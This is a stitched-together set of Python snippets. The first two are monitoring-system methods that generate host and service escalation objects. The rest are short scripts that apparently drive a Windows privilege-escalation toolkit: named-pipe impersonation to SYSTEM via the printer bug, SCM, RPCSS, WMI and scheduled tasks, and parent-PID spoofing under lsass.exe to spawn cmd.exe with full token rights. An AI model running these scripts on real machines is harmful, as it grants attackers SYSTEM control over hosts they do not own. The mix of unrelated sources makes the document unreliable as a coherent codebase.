def explode(self, escalations):
# Now we explode all escalations (host_name, service_description) to escalations
for es in self:
properties = es.__class__.properties
creation_dict = {'escalation_name': 'Generated-Serviceescalation-%s' % es.id}
for prop in properties:
if hasattr(es, prop):
creation_dict[prop] = getattr(es, prop)
# print "Creation an escalation with:", creation_dict
s = Escalation(creation_dict)
escalations.add_escalation(s)
def explode(self, escalations):
# Now we explode all escalations (host_name, service_description) to escalations
for es in self:
properties = es.__class__.properties
name = getattr(es, 'host_name', getattr(es, 'hostgroup_name', ''))
creation_dict = {
'escalation_name':
'Generated-Hostescalation-%d-%s' % (es.id, name)
}
for prop in properties:
if hasattr(es, prop):
creation_dict[prop] = getattr(es, prop)
s = Escalation(creation_dict)
escalations.add_escalation(s)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate esc = Escalation() esc.namedPipeImpersonationSystemViaPrinterBug() imp = Impersonate() imp.enableAllUserRights() #Not necessary but we can do it, we do it imp.executeCMDWithThreadEffectiveToken()
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() ppidLSASS = getPIDfromName('lsass.exe') esc.namedPipeImpersonationViaSpoofPPIDWithPID(pid=ppidLSASS, ps=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.printCandidatesServices() esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False) esc.namedPipeImpersonationViaAService("serviceWithDomainUserAdmin") #esc.namedPipeImpersonationViaAService("BcastDVRUserService_89401")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.namedPipeImpersonationSystemViaWmiJobCmd(ps=True)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.namedPipeImpersonationSystemViaTaskScdh(debug=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate import subprocess import time esc = Escalation() esc.namedPipeImpersonationSystemViaRPCSS() imp = Impersonate() imp.enableAllUserRights() #required, othwerwise not enough privileges imp.executeWithThreadEffectiveToken(appName=sys.argv[1])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.printCandidatesSpoofPPID() ppidLSASS = getPIDfromName('lsass.exe') esc.spoofPPID(ppid=ppidLSASS, appName="c:\\windows\\system32\\cmd.exe", cmdLine=None, lpProcessAttributes=None, lpThreadAttributes=None, bInheritHandles=0, creationFlags=(CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT), lpEnvironment=None, lpCurrentDirectory=None)